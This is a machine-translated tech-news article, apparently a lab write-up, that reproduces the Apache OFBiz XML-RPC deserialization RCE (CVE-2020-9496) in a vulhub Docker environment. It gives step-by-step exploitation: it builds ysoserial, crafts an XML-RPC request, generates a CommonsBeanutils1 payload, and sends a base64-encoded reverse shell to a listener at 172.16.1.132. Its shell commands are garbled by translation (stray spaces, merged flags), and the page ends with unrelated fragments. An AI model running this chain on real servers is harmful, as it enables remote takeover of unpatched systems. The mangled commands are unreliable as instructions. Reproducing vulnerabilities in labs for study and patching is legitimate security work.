In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
In this issue, the editor will bring you about how to achieve the reproduction of Apache Ofbiz XMLRPC RCE vulnerability CVE-2020-9496. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.
Introduction to 0x00
Apache OFBiz's full name is The ApacheOpen For Business Project. Is an open e-commerce platform, is a very famous open source project, provides a framework for building large and medium-sized enterprise-level, fast platform, cross-database, cross-application server multi-tier, distributed e-commerce WEB application system based on the latest J2EE/XML specifications and technical standards. OFBiz implements almost all the J2EE core design patterns, and the coupling between each module is relatively loose, and users can easily disassemble according to their own needs, which is very flexible.
Overview of 0x01 vulnerabilities
There is a deserialization vulnerability in Apache ofbiz, which allows attackers to construct specific xmlrpc http requests by accessing unauthorized interfaces, which can affect remote code execution.
0x02 affects version
-Apache Ofbiz:
< 17.12.04 0x03环境搭建 1、本次环境使用vulhub搭建,在装有docker环境的虚拟机中下载 git clone https://github.com/vulhub/vulhub.git2. Enter the vulnerability directory, use docker-compose to pull the vulnerability environment, and the green done indicates success.
Cd vulhub/ofbiz/CVE-2020-9496 /
Docker-compose up-d
3. Visit https://your-ip:8443/myportal/control/main in the browser to access the registration page
4. The environment needed to reproduce the installation vulnerability
4.1 install the java8 environment
Https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html chooses jdk to download according to its own system version
Create a folder and extract the downloaded java to the created file.
Mkdir / opt/java
Tar zxvf jdk-8u251-linux-x64.tar.gz-C / opt/java
4.3 add Java environment variables
Vim / etc/profile
Increase at the end
Export JAVA_HOME=/opt/java/ jdk1.8.0_141
Export CLASSPATH=.:$ {JAVA_HOME} / lib:$ {JRE_HOME} / lib
4.4 use environment variables to take effect immediately after adding. Check the java version after refreshing.
Source / etc/profile
Java-version
5. Install maven and download mvn using wget
Wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
Mkdir / opt/maven
Tar zxvf apache-maven-3.6.3-bin.tar.gz-C / opt/maven/
5.1 configuration environment change
Vim / etc/profile
5.2 add at the bottom
Export MAVEN_HOME=/opt/maven/apache-maven-3.6.3
Export PATH=$MAVEN_HOME/bin:$PATH
5.3 use environment variables to take effect immediately after adding. Check the maven version after refreshing.
Source / etc/profile
Mvn-version
Recurrence of 0x04 vulnerabilities
1. Download the java deserialization tool ysoserial on GitHub
Git clone https://github.com/frohoff/ysoserial.git
2. Enter the ysoserial directory and use maven to download and compile the package, which is successfully compiled into the following images
Mvn clean package-DskipTests
3. You can see a target directory in the ysoserial directory. Enter this directory.
4. Visit the following link on the page url to grab the package using Burp and send it to the Repeater module
Https://your-ip:8443/webtools/control/xmlrpc
5. Replace the packet with the following packet
POST / webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
ProjectDiscovery
Test
[base64-payload]
6. Use CommonsBeanutils1 using ysoserial to generate Payload to write files in the tmp directory
Java-jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch / tmp/success" | base64 | tr-d "\ n"
7. Copy the payload encoded by base64, paste it into the base64payload in the burp packet, and click send to check whether it has been written successfully in docker.
8. Take advantage of the loophole to rebound shell. Go to the following URL to encode the bounced shellpayload with base64.
Http://www.jackson-t.ca/runtime-exec-payloads.html
9. Encode the encoded shell once with the ysoserial tool.
Java-jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx} | {base64,-d} | {bash,-i}" | base64 | tr-d "\ n"
10. Set nc to listen, put the generated exp into the packet of burp and send it, and check nc snooping to return shell.
0x05 repair recommendation
1. Upgrade to the latest version is recommended.
The above is the editor for you to share how to achieve the recurrence of the Apache Ofbiz XMLRPC RCE vulnerability CVE-2020-9496, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.